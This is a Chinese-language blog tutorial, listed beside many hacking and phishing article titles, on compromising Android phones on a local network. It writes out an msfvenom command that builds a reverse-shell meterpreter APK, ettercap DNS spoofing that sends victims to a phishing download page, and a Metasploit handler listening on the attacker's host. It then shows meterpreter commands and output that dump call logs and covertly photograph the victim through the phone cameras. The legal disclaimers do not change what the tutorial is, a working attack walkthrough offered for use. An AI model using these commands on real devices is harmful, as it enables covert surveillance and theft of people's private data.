首页
学习
活动
专区
圈层
工具
发布
37 篇文章
1
7块钱的BadUSB,怎么玩
2
插一个U盘黑一台电脑-Badusb最详细制作教程
3
十块钱RMB | 用Digispark制作一个简单的Badusb
5
打造属于自己的渗透神器 第二篇
6
社工模拟——利用BadUSB穿透3层内网
7
穿透内网防线,USB自动渗透手法总结
8
【内网渗透】神器Mimikatz的入门简单实践
9
实战渗透 | 情侣空间钓鱼邀请,撸它
10
渗透实战之QQ空间钓鱼网站
11
【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]
12
QQFishing QQ钓鱼站点搭建
13
看我如何定位骗子,找出幕后诈骗的黑手(上)
14
我用Python渗透了一个钓鱼网站的所有信息
15
简单的制作一个钓鱼网页游戏_简单网页制作代码
16
攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
17
CobaltStrike专题 | CobaltStrike实现批量发送钓鱼邮件
18
关于钓鱼网站的原理以及防范方法
19
社会工程学之基础概念、IP获取、IP物理定位、文件属性社会工程学之基础概念、IP获取、IP物理定位、文件属性
20
关于ReelPhish神器的使用
21
七、Selenium与phantomJS----------动态页面模拟点击、网站模拟登录 每天一个小实例1(动态页面模拟点击,并爬取你想搜索的职位信息) 每天一个小实例2(模拟网站登录)我用的是
22
社会工程学 | cobalstrike批量发送钓鱼邮件方法
23
我用Python采集了所有微信好友的头像,发现了一个秘密
24
插入U盘自动攻击:BadUSB原理与实现(含视频)
25
珍惜数据,远离钓鱼
26
钓鱼网站相关数据
27
记一次识别钓鱼网站,所有的盗号都是不经意间
28
如何利用手机木马远程控制
29
如何使用Kali生成木马入侵安卓手机
30
黑客入侵你手机的方法不止两种哦
31
一个黑客的自白书
33
Kali之安卓木马
34
Kali利用Android木马渗透手机(高级篇)
35
记一次无线渗透
36
记一次渗透测试实战
37
你安全吗?丨点击“不明链接”后果是什么你知道吗?
清单首页技术文章详情

Kali利用Android木马渗透手机(高级篇)

利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马


前言

内网渗透,非公网IP上线。 不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏

互联网非法外之地,还请各位兄弟谨记,且行且珍惜。

第一步

生成安卓木马

代码语言:javascript
代码运行次数:0
复制
msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk

第二步制作钓鱼网页

在这里我已经简单的准备了一个页面 代码如下

将生成的木马和编写页面放置到/var/www/html/目录下

然后启动Apache2

代码语言:javascript
代码运行次数:0
复制
systemctl start apache2

第三步开启DNS劫持

*编辑ettercap的DNS文件

代码语言:javascript
代码运行次数:0
复制
nano /etc/ettercap/etter.dns

*启动ettercap

代码语言:javascript
代码运行次数:0
复制
ettercap -G

*操作步骤

在弹出的窗口选择自己的网卡然后扫描内网IP

选择网关 add to target 1 选择目标 add to target 2

点击图中的菜单在之后弹出的选项中选择第一个然后确定

然后我们开启攻击

开启攻击后我们打开插件双击dns_spoof进行DNS毒化操作

手机端状态

此时我们手机端无法联网,访问任何网页都是我们实现安排好的页面效果如下

可以看到木马是没有报毒的,至少在MIUI11下是没有提示有病毒,并且申请了很多的权限。

启动木马监听等待目标上线

我们在终端启动msfconsole依次执行:

代码语言:javascript
代码运行次数:0
复制
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.123.10 //kali 本机的ip
set LPORT 9055  //监听上线的端口 需要与生成木马的时候填写一样
exploit   //执行监听

然后我们静等目标上线

上面这张图是目标上线后的样子,当目标上线后我们就可以停止DNS劫持

当关闭劫持后目标恢复网络连接。

使用木马窃取信息

现在我们先使用木马窃取对方通话记录 在终端输入dump_calllog 此时返回的数据应该是

代码语言:javascript
代码运行次数:0
复制
meterpreter > dump_calllog
[*] Fetching 243 entries
[*] Call log saved to calllog_dump_20191126214943.txt
meterpreter > 

然后我们去root目录下能看到抓取到的通话记录打开后

接下来利用木马进行拍照 在终端输入webcam_list获取目标手机的摄像头数量

代码语言:javascript
代码运行次数:0
复制
meterpreter > webcam_list
1: Back Camera
2: Front Camera
meterpreter > 

返回给我们两个摄像头 一个前置一个后置 我们利用 webcam_snap -i 指定一个摄像头进行拍照

代码语言:javascript
代码运行次数:0
复制
webcam_snap -i 1

命令执行完成之后会自动打开照片展示出来

结尾

安卓木马的功能不仅仅只有这么一些,剩下的东西也是需要大家自己去摸索的,好了本次教程到此结束,还是需要提醒大家不要做出违法的事情,谢谢。

下一篇
举报
领券